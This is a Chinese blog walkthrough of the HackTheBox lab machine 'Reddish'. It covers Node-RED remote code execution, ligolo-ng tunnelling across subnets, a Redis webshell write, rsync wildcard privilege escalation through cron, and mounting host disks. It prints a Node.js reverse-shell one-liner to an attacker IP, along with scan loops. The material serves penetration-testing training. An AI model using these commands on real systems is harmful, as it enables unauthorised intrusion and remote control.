当前位置: 首页 > news >正文

CPTS-Reddish

这个机器可以练习多子网的隧道搭建,推荐使用ligolo-ng
在这里插入图片描述
来源:0xdf(https://0xdfimages.gitlab.io/img/reddish-network_map-3.webp)

枚举和利用

端口扫描
在这里插入图片描述
访问端口
在这里插入图片描述
在这里插入图片描述
发现是node-red,google,发现可能存在rce
在这里插入图片描述
利用exp
https://gist.github.com/qkaiser/79459c3cb5ea6e658701c7d203a8c297#file-noderedsh-py
在这里插入图片描述

node -e 'var net=require("net"),cp=require("child_process");var c=new net.Socket();c.connect(1880,"10.10.14.17",function(){var sh=cp.spawn("/bin/sh",[]);c.pipe(sh.stdin);sh.stdout.pipe(c);sh.stderr.pipe(c);});'

得到shell
在这里插入图片描述
然后隧道搭建和子网ip扫描

for i in $(seq 1 10); do ping -c 1 "172.19.0.$i" | grep from; done

在这里插入图片描述
ligolo-ng隧道搭建
在这里插入图片描述

在这里插入图片描述
常见端口扫描

for host in 1 2 3 4; do for port in 21 22 25 80 443 8080; do echo 172.19.0.$host:$port & openssl s_client -connect 172.19.0.$host:$port 2> /dev/null | grep CONNECTED; done; done

发现172.19.0.2 80端口开启
在这里插入图片描述
在这里插入图片描述
接着扫描172.19.0.3,发现redis
在这里插入图片描述
在这里插入图片描述
尝试写入webshell
在这里插入图片描述
成功
在这里插入图片描述
反弹一个shell
在这里插入图片描述
成功拿到一个shell
在这里插入图片描述
上传inpeas枚举
在这里插入图片描述
发现cron任务backup,查看
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
发现可以利用rsync通配符(https://book.hacktricks.wiki/zh/linux-hardening/privilege-escalation/wildcards-spare-tricks.html#rsync)
在这里插入图片描述
利用,写入一个反向shell脚本,利用cron任务执行
在这里插入图片描述

在这里插入图片描述
成功拿到shell
在这里插入图片描述
然后开始枚举和隧道搭建172.20.0.0/24子网
在这里插入图片描述
写入,
在这里插入图片描述
拿下一个shell
在这里插入图片描述
在这里插入图片描述
得到shell在这里插入图片描述
枚举/dev目录
在这里插入图片描述
尝试挂载sda1-5
在这里插入图片描述
在这里插入图片描述
进入sda2
在这里插入图片描述
拿到root.txt
在这里插入图片描述
user.txt在www的/home/somaro中
在这里插入图片描述

http://www.dtcms.com/a/353598.html

相关文章:

  • 【开发配置】云服务器配置Gitlab服务
  • 解决pod install报错问题的一些方法
  • 合金弹头全系列游戏合集分享 电脑安卓手机掌机SWITCH整合版 (1/2/X/3/4/5/6/7/XX)
  • Elasticsearch数据迁移快照方案初探(二):快照创建与多节点存储问题解决
  • Kafka经典面试题--Kafka的其他问题汇总
  • 嵌入式第三十九天(TCP多任务并发)
  • C语言二级考试环境配置详细教程【mac篇】
  • Java设计模式之《亨元模式》
  • HttpRequest.get()方法报错:301 Moved Permanently
  • XFile v2 系统架构文档
  • Unity List 相关
  • QOpenGLFunctions_2_1 与 OpenGL 的区别
  • 【系统架构设计(四)】软件工程:从瀑布到敏捷的演进之路
  • 【系统架构设计(三)】系统工程与信息系统基础下:企业信息化与电子商务-数字化转型的核心驱动力
  • 【Django + Pure Admin】基于Django+Vue3的前后端分离管理系统框架设计
  • 服务器硬件电路设计之 SPI 问答(六):如何提升服务器硬件电路中的性能?如何强化稳定性?
  • MySQL explain命令的作用
  • 什么是AI+?什么是人工智能+?
  • 济南大学杨波与济南青盟信息技术有限公司杨华伟
  • 北京国标竞品调查,知己知彼(竞品调查研究)
  • Java全栈开发面试实战:从基础到微服务的深度探索
  • Linux学习-TCP并发服务器构建
  • XState
  • 第五章:循环
  • Playwright之脱离元素,页面操作大全!
  • 2026 年美国国际太阳能展(RE+)
  • 如何在 Docker 和AKS上使用 IIS
  • 【Redis 进阶】Redis 典型应用 —— 分布式锁
  • F008 vue+flask 音乐推荐评论和可视化系统+带爬虫前后端分离系统
  • Android中APK包含哪些内容?